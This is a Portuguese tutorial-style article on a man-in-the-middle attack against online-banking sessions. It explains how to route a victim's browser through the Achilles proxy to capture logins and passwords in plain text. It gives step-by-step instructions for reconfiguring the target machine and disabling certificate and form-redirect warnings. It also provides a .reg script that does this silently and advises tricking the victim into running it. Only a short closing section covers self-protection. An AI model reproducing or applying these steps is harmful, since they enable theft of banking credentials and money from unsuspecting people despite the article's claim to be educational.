A tcnica Man-in-the-Middle

on Quinta, 03 Junho 2010. Imagine uma situao onde voc est conectado ao site do seu banco. Aparentemente tudo certo, Firewall Ativo, antivrus tambm rodando perfeitamente, voc est vendo o famoso cadeadinho na barra de status do seu navegador indicando que o site seguro, tambm est vendo o protocolo https na barra de endereo, nada de anormal, voc tem toda a certeza este o verdadeiro site do seu banco e realmente . Mas em poucos dias voc percebe que a sua conta bancria est ZERADA, ai voc se pergunta: O que aconteceu, se eu tomei todos os cuidados antes de entrar com a minha senha!? ... Onde estava o erro afinal? Ser que havia um HOMEM-NO-MEIO? A Tcnica Apesar de ser uma tcnica relativamente fcil de ser feita, no deixa de ser uma tcnica super poderosa. Muitos crackers usam para fins malficos como roubar senhas de clientes de bancos, mas a mesma pode ser usada por hackers para descobrir senhas de e-mails como por exemplo o Yahoo! Ou Hotmail que se tentssemos captura-las por tcnicas de sniffing no obteramos nada legvel. Neste artigo irei mostrar como os crackers capturam senhas de bancos on-line para demonstrar que os famosos tecladinhos virtuais so facilmente burlados apesar de toda a sua fama de seguro. Nenhuma forma de proteo existente nos dias de hoje capaz de parar esta tcnica.

Espero que nenhum de nossos leitores use o conhecimento aqui obtido para causar prejuzos a terceiros, uma vez que escrevi este artigo apenas para fins didticos e no poder ser usado como forma de incentivo a criminalidade. O que garante que eu possa passar este conhecimento para voc sem est cometendo um crime o artigo 5 da Constituio Federal que nos garante a Liberdade de Expresso. Como funciona? Veja a imagem a seguir, esta uma representao de uma conexo normal, sem interceptaes, e funciona de modo que o cliente passa os dados criptografados para o servidor e vice-versa, tornando assim impossvel o uso de tcnicas de sniffing para a capturados dados trocados entre o cliente e o servidor.

Abaixo segue uma representao de uma conexo interceptada, (usando a tcnica Man-in-The-Middle), e funciona de modo que o hacker engana o cliente e o servidor. Engana o cliente se fazendo passar por um simples servidor de proxy, e engana o servidor se passando pelo prprio cliente, desta forma os dados chegam at o hacker em texto puro, pois os dois pensam que o hacker uma fonte confivel.

Conhecendo o Anchiles O Achiles nada mais do que um simples servidor de proxy, que se usado de forma incorreta pode servir como uma poderosa ferramenta hacker, que nas mo de uma pessoa mal intencionada pode causar grandes prejuzos, uma verdadeira faca de dois gumes. Voc pode usar outro programa semelhante mais vamos usar este no exemplo. Configurando

Em seguida clique no boto com um sinal de play no achiles para iniciar o servidor de proxy, para confirmar se o Achiles realmente iniciou o servidor verifique na barra de status do programa se ele est como running como na figura abaixo.

Agora abra as janelas do cliente e do servidor, para abrir a janela do cliente basta clicar no boto do cone C e para a abrir a janela do servidor basta clicar na janela com o cone S e aogra o Achiles j est configurado vamos agora configurar a mquina alvo.

Preparando o computador alvo Um dos grandes inconvenientes desta tcnica que precisamos ter acesso fsico mquina do alvo para fazermos algumas configuraes para que a tcnica d certo ou ento poderamos escrever um controle ActiveX que quando o alvo entrasse em uma pgina contendo este controle malicioso feito pelo hacker, estas alteraes fossem feitas no computador do alvo automaticamente, mas isto uma rea muito avanada e ser estudada em um outro artigo, talvez. Para preparar o computador do alvo siga os passos: Etapa 1 Abra o Internet Explorer do alvo, clique no menu Ferramentas / Opes de Internet... E em seguida na aba Conexes e depois em Configuraes da LAN. Etapa 2 Tomando como exemplo a figura abaixo, na mquina do alvo marque a opo de nmero 01 e em seguida digite o seu IP no campo nmero 02 (voc pode ver qual o seu IP acessando http://www.ip-adress.com) e no campo de nmero 03 digite a porta que voc especificou no achiles quando o configurava. Agora clique em OK e v para a aba Avanadas.

Etapa 3

Na aba Avanadas role a drop-down at encontrar as opes no grupo Segurana: Avisar quando o certificado do site for invlido Avisar se os formulrios submentidos estiverem sendo redirecionados Pronto! Agora s esperar que o alvo acesse site e digite seus dados (login e senha), e logo aparecer na janela de Cliente do Achiles. Na janela do servidor voc poder ver as respostas que o servidor est dando para o cliente, use com cuidado! Script automatizado Vamos escrever um script que far todo o trabalho pesado pra voc, ele far toda a configurao mostrada acima, automaticamente basta apenas execut-lo e pronto o computador da vtima j est preparado para a ser interceptado. Abra o notepad e digite o seguinte cdigo, (sem a numerao das linhas):
Windows Registry Editor Version 6.01 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings] "ProxyEnable"=dword:00000001 "ProxyServer"="127.0.0.1:8080" [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings] "WarnonBadCertRecving"=dword:00000000 "WarnOnPostRedirect"=dword:00000000

Em seguida salve o arquivo com a extenso .reg. Como configurar o script Para configurar este script bastante simples basta voc editar a linha de nmero 4 ("ProxyServer"="127.0.0.1:8080") no cdigo do script colocando l informaes sobre o IP e porta do servidor de proxy que no caso o IP do seu computador. No lugar de 127.0.0.1 voc dever digitar o seu IP e no lugar de 8080 voc dever digitar a porta pela qual o servidor do proxy vai se comunicar com o cliente, ficando assim "ProxyServer"="ip.do.seu.micro:porta".

O script est pronto! Agora s voc fazer com que o alvo o abra ou em um rpido acesso fsico a mquina do mesmo voc poder execut-lo j que sua execuo bastante rpida. Proteja-se Se voc perceber a internet extremamente lenta ou se for emitido algum aviso sobre o certificado de segurana invlido, quando voc acessar alguma pgina segura como a pgina de um banco, desconfie! Pois voc pode estar sendo mais uma vtima desta poderosa tcnica. Crie o habito de checar as configuraes de proxy (Ferramentas>Opes de Internet...) toda vez que for visitar sites de bancos ou passar informaes sigilosas via internet, assim voc ficar bem mais protegido. Pode existir novas tcnicas que aplicam o golpe Man-in-the-Maddle e softwares especificos para o feito, ento sempre se mantenha atualizado sobre isto.